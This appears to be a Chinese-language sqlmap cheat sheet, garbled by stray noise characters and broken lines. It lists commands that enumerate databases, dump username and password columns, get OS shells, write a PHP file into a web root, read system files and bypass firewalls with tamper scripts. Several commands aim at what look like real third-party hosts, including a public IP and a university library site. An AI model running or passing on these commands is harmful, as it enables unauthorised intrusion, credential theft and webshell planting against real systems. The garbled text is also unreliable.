sqlmap使用实例

admin

/pentest/database/sqlmap

9 }; s' n) S  b% q) I1 [update :::::>     in the folder   after  execute    following   order : svn update

sqlmap.py -r 1.txt --current-db
3 D& s' h+ T1 j
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
' p% P- r( l4 e4 q, }% m  n. }
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
猜解数据库
' J4 D  x8 T- L/ G: c./sqlmap.py -u "injection-url" --dbs
- |% d+ O$ P: D* V3 ssqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
7 k! C  m2 [  g, c& o( j
8 [5 I6 p* k3 r- y猜解表名
2 v1 a+ Q" q/ h8 X, O- Z./sqlmap.py -u "injection-url" -D database_name --tables

1 X9 Q- S" @8 Z) b( V4 Qsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump

0 ^1 f$ B6 g1 n6 j- [sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
9 t$ ^# c& t0 p6 x6 H+ Ssqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
8 e: ]" w& T& R7 n: x  r- Psqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
# r0 k. i  O: J# Gsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
/ ^. ]- d" Z( q" D$ e
+ A7 k1 a! s; l, E/ p) a* a1 dsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
4 l+ _/ O, G. r: isqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
' ?; n0 R$ p0 @* t4 ]5 p& t6 l) B7 Isqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
  |3 Z9 u% b/ v& |; t, }sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
/ {4 f- q8 q( a, M5 V
% `" v8 N( \: L1 H/ wsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
  W- `3 n; y8 s5 xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
7 }8 K7 Y1 t) Q( Q* ]% y
( W& A6 S4 T6 ?4 {* E0 j; Esqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
) x5 B7 N' O& d$ g8 u猜解列名
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
7 u2 R  l: t" h$ h0 m$ W$ }; U
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
9 E/ l2 M0 R/ e" Gsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
* ~6 J- S% g# I; B
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
&submit=Go
猜解值
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
  S5 h7 V* N6 u' `+ z. R; }1 |========================================================
1 N/ N7 B( R8 ]3 y搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
6 Y3 S$ u9 {& j) @$ S8 w8 S读取指定文件（需权限）
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
查看当前 用户 及 数据库
0 {0 {% j0 \  t; h5 B% V) D5 b/sqlmap.py -u "injection-url" --current-user --current-db
# ]# `6 F- D# r: K0 k/ n本地文件 写入 远程目标绝对路径
( U8 `% C' `# M& P/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
* q* Y% O* P" @4 A. A3 g查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
( @) n" w$ E$ h% |8 y8 j读取所有数据库用户或指定数据库用户的密码
) V" k/ |& i; |" N4 x; j, vsqlmap.py -r 1.txt --users --passwords
0 a9 N6 Z1 D/ c5 a1 t: s# i% T1 `' |sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
9 O* I1 y3 N0 d/ r
/sqlmap.py -u "injection-url" --passwords -U root
5 [/ j* m  s8 T) f8 a+ U
$ C, r% h& c! R& Q8 Q--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
6 W9 W4 n: q: E* n' F/ Y+ W/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/ o, `% m. s5 D$ h2 R7 b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
5 L  i7 n1 S7 X1 U( u+ j